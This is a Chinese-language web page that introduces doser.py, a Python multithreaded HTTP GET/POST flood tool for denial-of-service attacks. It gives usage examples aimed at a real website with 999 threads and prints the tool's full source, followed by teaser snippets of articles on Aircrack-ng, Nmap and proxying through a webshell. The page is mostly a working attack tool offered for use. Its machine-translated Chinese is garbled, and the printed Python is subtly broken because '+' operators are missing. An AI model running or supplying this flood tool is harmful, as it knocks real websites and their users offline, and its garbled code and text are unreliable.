Denial of Service (DoS)是分布式系统拒绝服务攻击攻击器;
doser.py是一款用Python撰写的于HTTP或HTTPS恳求的DoS专用工具;主要是对于有“application-denial-of-service (程序运行拒绝服务攻击(Dos))"系统漏洞的网址;
使用 ***
doser.py [-h] [-g G] [-p P] [-d D] [-ah AH] [-t T]
可选主要参数:
-h,--help 显示信息此协助信息内容并撤出
-g 特定GET恳求。 使用 *** :-g'<url>'
-p 特定POST恳求。 使用 *** :-p'<url>'
-d 为POST恳求特定数据信息重力梯度
-ah 特定addtional题目
-t 特定要应用的线程数
1、999个进程推送GET恳求:
python doser.py -t 999 -g 'https://www.fujieace.com'
2、999个进程应用json数据信息推送POST恳求:
python doser.py -t 999 -p 'https://www.fujieace.com' -ah 'Content-Type: application/json' -d '{"json": "payload"}'
1、github网站地址:https://github.com/Quitten/doser.py
2、doser.py编码:
import requests
import sys
import threading
import random
import re
import argparse
host=''
headers_useragents=[]
request_counter=0
printedMsgs = []
def printMsg(msg):
if msg not in printedMsgs:
print ("\n" msg " after %i requests" % request_counter)
printedMsgs.append(msg)
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
def randomString(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str = chr(a)
return(out_str)
def initHeaders():
useragent_list()
global headers_useragents, additionalHeaders
headers = {
'User-Agent': random.choice(headers_useragents),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Referer': 'http://www.google.com/
?q=' randomString(random.randint(5,10)),
'Keep-Alive': str(random.randint(110,120)),
'Connection': 'keep-alive'
}
if additionalHeaders:
for header in additionalHeaders:
headers.update({header.split(":")[0]:header.split(":")[1]})
return headers
def handleStatusCodes(status_code):
global request_counter
sys.stdout.write("\r%i requests has been sent" % request_counter)
sys.stdout.flush()
if status_code == 429:
printMsg("You have been throttled")
if status_code == 500:
printedMsg("Status code 500 received")
def sendGET(url):
global request_counter
headers = initHeaders()
try:
request_counter =1
request = requests.get(url, headers=headers)
# print 'her'
handleStatusCodes(request.status_code)
except:
pass
def sendPOST(url, payload):
global request_counter
headers = initHeaders()
try:
request_counter =1
if payload:
request = requests.post(url, data=payload, headers=headers)
else:
request = requests.post(url, headers=headers)
handleStatusCodes(request.status_code)
except:
pass
class SendGETThread(threading.Thread):
def run(self):
try:
while True:
global url
sendGET(url)
except:
pass
class SendPOSTThread(threading.Thread):
def run(self):
try:
while True:
global url, payload
sendPOST(url, payload)
except:
pass
# TODO:
# check if the site stop responding and alert
def main(argv):
parser = argparse.ArgumentParser(description='Sending unlimited amount of requests in order to perform DoS attacks. Written by Barak Tawily')
parser.add_argument('-g', help='Specify GET request. Usage: -g \'<url>\'')
parser.add_argument('-p', help='Specify POST request. Usage: -p \'<url>\'')
parser.add_argument('-d', help='Specify data payload for POST request', default=None)
parser.add_argument('-ah', help='Specify addtional header/s. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*')
parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int)
args = parser.parse_args()
global url, payload, additionalHeaders
additionalHeaders = args.ah
payload = args.d
if args.g:
url = args.g
for i in range(args.t):
t = SendGETThread()
t.start()
if args.p:
url = args.p
for i in range(args.t):
t = SendPOSTThread()
t.start()
if len(sys.argv)==1:
parser.print_help()
exit()
if __name__ == "__main__":
main(sys.argv[1:])
什么是Aircrack-ng? Aircrack-ng是一个互联网黑客工具,由一个排序嗅探器,探测器,WPA / WPA2-PSK破解器,WEP和用以802.11无线网络的分析工具构成。该专用工具适...
从事SEO的朋友应该对黑帽这个词并不陌生,有的甚至嗤之以鼻,有的避而远之,包括小马前段时间写的《一个菜鸟SEOer对白帽和黑帽SEO的理性思考》,也倡导大家要做白帽SEO,总之各有见解,难道黑帽S...
什么是Angry IP Scanner? Angry IP Scanner是一个混合开发和一个开源系统互联网扫描机,建立迅速,便于应用。网络工程师一般 应用大中型和中小型企业,金融机构和政府部门。此...
Nmap实际作用:端口扫描器,协议书扫描仪,漏洞检测,绕开安全防护,漏洞检测等。 一、Nmap端口扫描器 端口号情况: 1、Open:端口号打开,有程序流程监视此端口号...
什么叫NetworkMiner? 互联网挖矿由网络信息安全手机软件经销商Netresec建立。Netresec主要从事互联网调查取证和数据流量剖析的手机软件和程序流程。显而易见,做为安全性技术专业工...
有时候要代理进内网,但是服务器没有外网端口,也没法执行命令反弹lcx什么的,也没有提权什么什么的,只有一个webshell,这个时候就比较蛋疼了。 鄙人不才,写了一个比较山寨的php...